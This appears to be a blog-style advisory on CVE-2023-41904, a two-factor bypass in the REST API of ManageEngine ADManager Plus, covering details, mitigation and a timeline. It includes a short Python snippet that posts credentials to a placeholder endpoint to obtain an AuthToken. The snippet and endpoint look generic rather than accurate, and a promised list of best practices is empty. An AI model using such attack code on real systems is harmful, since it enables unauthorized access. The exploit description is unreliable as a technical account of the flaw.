CVE-2023-41904 - Zoho ManageEngine ADManager Plus before 7203 allows 2FA bypass in REST APIs

A recent vulnerability, known as CVE-2023-41904, has been discovered in Zoho ManageEngine ADManager Plus, a popular web-based Active Directory management and reporting solution. This vulnerability allows an attacker to bypass the two-factor authentication (2FA) process in the REST APIs for AuthToken generation and potentially gain unauthorized access to sensitive information. This post will provide a detailed explanation of the exploit and how to mitigate it.

Vulnerability Details

The vulnerability CVE-2023-41904 affects Zoho ManageEngine ADManager Plus products before version 7203 and specifically targets the 2FA authentication process. As REST APIs are used for various administrative tasks and to automate processes, this vulnerability allows an attacker with valid credentials to bypass 2FA and generate an AuthToken without going through the proper 2FA process.

Here's a code snippet demonstrating how this exploit works

import requests

url = "https://example.com/rest-api/authenticate";

payload = {
  "username": "attacker",
  "password": "attacker_password"
}

headers = {
  "Content-Type": "application/json"
}

response = requests.post(url, headers=headers, json=payload)

if response.status_code == 200:
  auth_token = response.json().get("AuthToken")
  print("Successfully bypassed 2FA and generated AuthToken:", auth_token)
else:
  print("Failed to authenticate")

In this example, the attacker sends a POST request to the "/rest-api/authenticate" endpoint with their username and password. If the authentication is successful, the server responds with the AuthToken without requiring the user to provide a second factor of authentication, effectively bypassing the 2FA mechanism in place.

Original References

1. CVE-2023-41904: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-41904

2. Zoho Security Advisory: https://www.manageengine.com/products/ad-manager/admanager-plus-security-update.html

Mitigation

To mitigate CVE-2023-41904 vulnerability, users need to upgrade their Zoho ManageEngine ADManager Plus installations to version 7203 or later. Taking this action will ensure the proper enforcement of 2FA in REST APIs and prevent unauthorized access.

Additionally, organizations are advised to follow best practices for securing their REST APIs, such as:

Conclusion

CVE-2023-41904 is a critical vulnerability that allows an attacker to bypass two-factor authentication in REST APIs for AuthToken generation in Zoho ManageEngine ADManager Plus. By upgrading to the latest version and following security best practices, organizations can mitigate the risk and secure their environments.

Timeline

Published on: 09/27/2023 15:19:00 UTC
Last modified on: 09/28/2023 17:41:00 UTC